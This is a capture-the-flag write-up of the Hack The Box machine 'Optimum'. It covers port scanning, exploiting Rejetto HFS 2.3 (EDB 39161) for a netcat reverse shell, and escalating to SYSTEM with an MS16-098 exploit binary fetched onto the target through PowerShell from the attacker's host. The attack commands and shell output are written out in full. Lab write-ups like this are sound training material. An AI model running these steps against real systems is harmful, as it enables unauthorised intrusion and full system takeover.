Optimum
Contents
Ports scan
root@kali:~/HTB/Machines# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.8 --rate=1000
Starting masscan 1.0.5 at 2019-11-15 19:55:00 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.8
Nmap output
# Nmap 7.80 scan initiated Fri Nov 15 14:56:05 2019 as: nmap -A -T4 -v -oN nmap.txt 10.10.10.8 Nmap scan report for optimum.htb (10.10.10.8) Host is up (0.046s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1 | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: HFS 2.3 |_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.169 days (since Fri Nov 15 10:52:39 2019) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 44.00 ms 10.10.14.1 2 52.19 ms optimum.htb (10.10.10.8)
Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Nov 15 14:56:24 2019 -- 1 IP address (1 host up) scanned in 18.63 seconds
Web portal
Search vulnerability
root@kali:~/HTB/Machines/Optimum# searchsploit Rejetto HTTP File Server
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Rejetto HTTP File Server (HFS) - Remot | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x | exploits/windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 | exploits/multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - | exploits/windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - | exploits/windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2. | exploits/windows/webapps/34852.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
User flag
The vulnerability 39161aloows opens a remote shell.
root@kali:~/HTB/Machines/Optimum# searchsploit -m 39161.py
Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
URL: https://www.exploit-db.com/exploits/39161
Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
In the script we modify the parameters ip and port with our data
ip_addr = "10.10.14.34" #local IP address
local_port = "4444" # Local Port number
Launch listener
root@kali:~/HTB/Machines/Optimum# rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Launch web server with netcat
The exploit needs to download the file nc.exe from a web server located on attacker IP.
root@kali:~/HTB/Machines/Optimum# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Run the exploit
root@kali:~/HTB/Machines/Optimum# python 39161.py 10.10.10.8 80
The listener opens the reverse shell
root@kali:~/HTB/Machines/Optimum# rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.8. Ncat: Connection from 10.10.10.8:49181. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami whoami optimum\kostas
C:\Users\kostas\Desktop>type user.txt.txt type user.txt.txt <USER FLAG>
User escalation
Create exploit
root@kali:~/HTB/Machines/Optimum# searchsploit ms16-098
--------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098) | exploits/windows_x86-64/local/41020.c
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2) | exploits/windows_x86-64/local/42435.txt
--------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Copy the source file
root@kali:~/HTB/Machines/Optimum# searchsploit -m 41020
Exploit: Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)
URL: https://www.exploit-db.com/exploits/41020
Path: /usr/share/exploitdb/exploits/windows_x86-64/local/41020.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /root/HTB/Machines/Optimum/41020.c
Download the complied executable
root@kali:~/HTB/Machines/Optimum# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe --2019-11-15 22:17:50-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe Resolving github.com (github.com)... 192.30.253.113 Connecting to github.com (github.com)|192.30.253.113|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe [following] --2019-11-15 22:17:50-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.204.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.204.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 560128 (547K) [application/octet-stream] Saving to: ‘41020.exe’
41020.exe 100%[=================================================================================>] 547.00K --.-KB/s in 0.09s
2019-11-15 22:17:50 (5.80 MB/s) - ‘41020.exe’ saved [560128/560128]
Upload exploit to server
C:\Users\kostas\Desktop>powershell -c "Invoke-WebRequest -Uri http://10.10.14.34/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe" powershell -c "Invoke-WebRequest -Uri http://10.10.14.34/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
Run exploit
C:\Users\kostas\Desktop>41020 41020 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami whoami nt authority\system C:\Users\kostas\Desktop>cd .. cd ..
C:\Users\kostas>cd .. cd ..
C:\Users>cd Administrator cd Administrator
C:\Users\Administrator>cd Desktop cd Desktop
C:\Users\Administrator\Desktop>type root.txt type root.txt <ROOT FLAG>
References
Daniel Simao 15:48, 15 November 2019 (EST)
